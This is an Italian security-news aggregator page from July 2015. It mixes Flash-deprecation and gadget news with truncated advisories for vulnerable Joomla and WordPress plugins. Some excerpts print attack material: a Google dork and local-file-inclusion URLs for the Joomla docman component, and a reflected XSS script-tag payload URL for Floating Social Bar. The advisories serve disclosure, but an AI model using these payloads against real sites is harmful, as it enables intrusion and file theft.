Anche Google Chrome disabilita Flash: falle scoperte da Hacking Team

16 luglio 2015 - Fonte: http://www.mondounix.com

Anche Google Chrome disabilita Flash: falle scoperte da Hacking Team

DOPO Firefox, anche Chrome disabilita il supporto ad Adobe Flash, il popolare lettore di video che dopo l'attacco ad Hacking Team ha mostrato una serie di falle sfruttabili dagli hacker. "Flash è un cadavere che cammina, sono tanti anni che ha delle vulnerabilità. Bisogna prendere atto che è un programma finito", spiega all'ANSA Matteo Flora, informatico ed esperto di sicurezza.

Le disattivazioni su due motori di ricerca molto usati come Chrome e Firefox, arrivano a pochi giorni dalle dichiarazioni del responsabile della sicurezza di Facebook, Alex Stamos, che ha chiesto ad Adobe...

Leggi il seguito »

Commodore PET returns as a nostalgia-powered Android phone

16 luglio 2015 - Fonte: http://www.mondounix.com

Commodore PET returns as a nostalgia-powered Android phone

If the name "Commodore" conjures up images of clicking keyboards, beige boxes, and blinking command lines rather than buttery smooth ballads, this one's for you. Yes, that mainstay of '80s home computing is back, this time as a mobile phone. The Commodore PET—which shares its name with the iconic all-in-one computer released in 1977—might not run Commodore BASIC, but it does feature a customised version of Android 5.0 Lollipop, a 5.5-inch 1080p IPS display, and a pair of emulators for running old Commodore software.

OK, so the two Italian entrepreneurs behind the PET might be playing on nostalgia just a tad in order to...

Leggi il seguito »

Joomla Docman Path Disclosure / Local File Inclusion

16 luglio 2015 - Fonte: http://www.mondounix.com
# Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI)
# CWE: CWE-200(FPD) CWE-98(LFI/LFD)
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 13/07/2015
# Vendor Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman
# Google Dork: inurl:"/components/com_docman/dl2.php"
 
# Xploit (FPD): 
 
 Get one target and just download with blank parameter: 
 http://www.site.com/components/com_docman/dl2.php?archive=0&file=
 
 In title will occur Full Path Disclosure of server.
 
# Xploit (LFD/LFI):
 
 http://www.site.com/components/com_docman/dl2.php?archive=0&file=[LDF]
 
...

Leggi il seguito »

WordPress Image Export 1.1 Arbitrary File Download

16 luglio 2015 - Fonte: http://www.mondounix.com
Title: Remote file download vulnerability in Wordpress Plugin image-export v1.1
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-01
Download Site: https://wordpress.org/plugins/image-export
Vendor: www.1efthander.com
Vendor Notified: 2015-07-05
Vendor Contact: https://twitter.com/1eftHander
Description: Image Export plugin can help you selectively download images uploaded by an administrator .
Vulnerability:
The code in file download.php doesn't do any checking that the user is requesting files from the uploaded images directory only.  And line 8 attempts to
unlink the file after being downloaded.  This script could be used to delete files out of the wordpress directory if file permissions allow.
 
      1 <?php
     ...

Leggi il seguito »

WordPress Plotly 1.0.2 Cross Site Scripting

16 luglio 2015 - Fonte: http://www.mondounix.com
Details
================
Software: Plotly
Version: 1.0.2
Homepage: http://wordpress.org/plugins/wp-plotly/
Advisory report: https://security.dxw.com/advisories/stored-xss-in-plotly-allows-less-privileged-users-to-insert-arbitrary-javascript-into-posts/
CVE: CVE-2015-5484
CVSS: 6.5 (Medium; AV:N/AC:L/Au:S/C:P/I:P/A:P)
 
Description
================
Stored XSS in Plotly allows less privileged users to insert arbitrary JavaScript into posts
 
Vulnerability
================
This plugin allows users who do not have the unfiltered_html capability to insert JavaScript into posts/pages which gets executed by the browsers of other users.
On single sites, only Administrators have the unfiltered_html capability, and on multisite,...

Leggi il seguito »

WordPress WP-PowerPlayGallery 3.3 File Upload / SQL Injection

16 luglio 2015 - Fonte: http://www.mondounix.com
Title: Remote file upload vulnerability & SQLi in wordpress plugin wp-powerplaygallery v3.3
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-27
Download Site: https://wordpress.org/plugins/wp-powerplaygallery
Vendor: WP SlideShow
Vendor Notified: 2015-06-29
Advisory: http://www.vapid.dhs.org/advisory.php?v=132
Vendor Contact: plugins@wordpress.org
Description: This is the best gallery for touch screens. It is fully touch enabled with great features. This gallery is compatible wiht iphone and ipads. It is also allow us to use it as a widget.You can also enable this Powerplay Gallery on your wordpress site by placing code snippet in your template (.php) files. It shows flash gallery for desktops and touch enabled version for ipad...

Leggi il seguito »

WordPress Floating Social Bar 1.1.5 Cross Site Scripting

16 luglio 2015 - Fonte: http://www.mondounix.com
# Exploit Title: Floating Social Bar 1.1.5 XSS
# Date: 09-01-2015
# Software Link: https://wordpress.org/plugins/floating-social-bar/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
 
1. Description
 
Everyone can access save_order().
 
File: floating-social-bar\class-floating-social-bar.php
 
add_action( 'wp_ajax_nopriv_fsb_save_order', array( $this, 'save_order' ) );
 
$_REQUEST['items'] is not escaped.
 
http://security.szurek.pl/floating-social-bar-115-xss.html
 
2. Proof of Concept
 
http://wordpress-url/wp-admin/admin-ajax.php?action=fsb_save_order&items[1]="><script>alert("XSS");</script>
 
XSS...

Leggi il seguito »

Adobe promises Flash improvements after Firefox and Facebook snubs

15 luglio 2015 - Fonte: http://www.mondounix.com

Adobe promises Flash improvements after Firefox and Facebook snubs

Adobe has promised to do it all can to improve the security of its much maligned Flash tool, in response to criticisms from the new CIO of Facebook and Mozilla blocking the tool from its Firefox browser.

In a blog post by Adobe the company said it was working hard to fix issues that are coming to light since data was leaked from the server of Italian surveillance software firm Hacking Team.

It went on to say that it was because Flash is so widely used it is naturally a target for hackers, but that it is confident it can maintain an adequate level of security for the product.

"Flash Player is one of the most...

Leggi il seguito »

WordPress Twenty Fifteen 4.2.1 Cross Site Scripting

13 luglio 2015 - Fonte: http://www.mondounix.com
Information
--------------------
Advisory by Netsparker.
Name: DOM XSS Vulnerability in Twenty Fifteen WordPress Theme
Affected Software : WordPress
Affected Versions: 4.2.1 and probably below
Vendor Homepage : https://wordpress.org/ and
https://wordpress.org/themes/twentyfifteen/
Vulnerability Type : DOM based Cross-site Scripting
Severity : Important
CVE-ID: CVE-2015-3429
Netsparker Advisory Reference : NS-15-007
 
Description
--------------------
By exploiting a Cross-site scripting vulnerability the attacker can
hijack a logged in user’s session. This means that the malicious
hacker can change the logged in user’s password and invalidate the
session of the victim while the hacker maintains access. As seen from
the...

Leggi il seguito »

WordPress PictoBrowser 0.3.1 CSRF / XSS

13 luglio 2015 - Fonte: http://www.mondounix.com
**************************************************************************************
# Title: CSRF / Stored XSS Vulnerability in PictoBrowser Wordpress Plugin 
# Author: Manideep K  
# CVE-ID: CVE-2014-9392
# Plugin Homepage: https://wordpress.org/plugins/pictobrowser-gallery/
# Version Affected: 0.3.1 (probably lower versions)
# Severity: High 
 
# Description: 
Vulnerable Parameter: all text boxes, to name one - pictoBrowserFlickrUser
Vulnerability Class: 
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)) 
 
# About Vulnerability:  This plugin is vulnerable to a combination of CSRF/XSS attack meaning...

Leggi il seguito »